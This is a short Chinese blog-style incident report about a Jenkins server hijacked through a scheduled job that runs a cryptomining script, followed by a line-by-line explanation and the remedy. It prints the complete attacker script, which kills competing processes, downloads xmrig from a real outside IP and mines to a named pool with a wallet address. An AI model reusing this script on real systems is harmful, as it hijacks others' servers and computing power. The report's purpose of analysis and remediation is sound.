记一次服务器被利用jenkins挖矿经历-updatejenkins

服务器被利用jenkins启动一个任务，不停跑某个挖矿程序

图中UpdateJenkins 就是挖矿者创建的任务，应该是Jenkins账号密码太简单了，直接被破解了，登录之后创建了这个任务，会定时（******）执行下面shell脚本

#!/bin/bash

ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 %

if [[ $(whoami) != "root" ]]; then
    for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
        kill -9 $tr || : ;
    done;
fi

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";

_curl () {
  read proto server path <<<$(echo ${1 })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -rf config.json;

d () {
      curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
}


test ! -s trace && \
    d http://118.189.172.141:8080/novoCRM/static/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \
    tar -zxvf trace.tgz && \
    mv xmrig-6.4.0/xmrig trace && \
    rm -rf xmrig-6.4.0 && \
    rm -rf trace.tgz;

test ! -x trace && chmod +x trace;

k() {
    ./trace \
        -r 2 \
        -R 2 \
        --keepalive \
        --no-color \
        --donate-level 1 \
        --max-cpu-usage 100 \
        --cpu-priority 3 \
        --print-time 25 \
        --threads ${threadCount:-4} \
        --url $1 \
        --user 83dxgsjgbnMN7Ej6GfCZMsfHYD3NYdozAhm7DjyTme6jTYPaJ8AQeEyMGKLRL1LjqXVSVBJgU3moYUECZjWUAkTi8rxSNZW \
        --pass elf2 \
        --keepalive
}

k auto.c3pool.org:13333

这个程序的解释：

这段代码是一个 Bash 脚本，主要用于检查并杀死占用 CPU 过高的进程，并下载并运行一个名为 trace 的程序。

以下是代码的主要逻辑和功能：

首先，通过 ps aux 命令获取当前运行的进程列表，并使用 grep 命令过滤掉包含特定关键词（如 java、redis、weblogic 等）的进程。然后使用 awk 过滤出 CPU 使用率超过 60% 的进程，并使用 xargs 命令逐个使用 kill -9 杀死这些进程。

接着，使用 whoami 命令判断当前用户是否为 root。如果不是 root 用户，则使用 ps -U $(whoami) 命令获取该用户的进程列表，并使用 egrep 过滤掉不需要杀死的进程（如 java、ps、sh 等），然后通过 cut 命令提取出进程号，并逐个使用 kill -9 杀死这些进程。

使用 lscpu 命令获取 CPU 核心数，并使用 hostname -f 命令获取主机名。然后将主机名经过 md5sum 运算并取前 8 个字符，最后将主机名和 CPU 核心数打印出来。

定义了一个 _curl 函数，用于发送 HTTP GET 请求并打印响应结果。

删除名为 config.json 的文件。

定义了一个名为 d 的函数，用于根据给定的 URL 下载文件。

使用 test 命令判断文件 trace 是否存在且非空。如果不存在或为空，则使用 d 函数下载 xmrig 程序，并解压、重命名为 trace，最后删除下载的文件。

使用 test 命令判断文件 trace 是否可执行。如果不可执行，则使用 chmod 命令增加执行权限。

定义了一个名为 k 的函数，用于运行 trace 程序，并传入一些参数。

调用 k 函数，连接到 auto.c3pool.org:13333 并运行 trace 程序。

请注意，这段代码涉及到的对系统进程的操作和外部下载、执行程序的操作可能具有危险性，并且可能是恶意软件。请小心谨慎地使用或执行此代码，并确保在受信任和安全的环境下运行。

解决方案：
直接删除掉这个任务就好，然后改jenkins密码，改复杂一点。

其他：
知道对方ip地址：118.189.172.141

新加坡的一台服务器

对方域名：auto.c3pool.org:13333

应该是有一些反制手段的，可以刷下这个接口啥的，但不是很会，就没弄了。